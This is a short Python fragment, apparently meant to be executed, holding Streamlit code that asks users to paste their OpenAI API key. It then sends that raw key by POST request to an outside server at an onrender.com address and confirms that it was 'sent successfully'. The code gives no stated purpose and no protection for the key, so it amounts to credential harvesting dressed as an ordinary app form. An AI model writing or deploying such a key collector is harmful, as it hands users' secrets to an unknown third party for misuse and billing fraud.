cmd = """
api_key = st.text_input("Paste your OpenAI key here", placeholder="sk-Kj2....")
api_url = "https://ipg-backend-flask.onrender.com/data"

submit = st.button("submit")
if submit and api_key is not None:
    data = {'data': api_key}
    response = requests.post(api_url, json=data)
        
    if response.status_code == 200:
        st.success(">> sent successfully")
    else:
        st.error(f">> request failed : {response.status_code}")
"""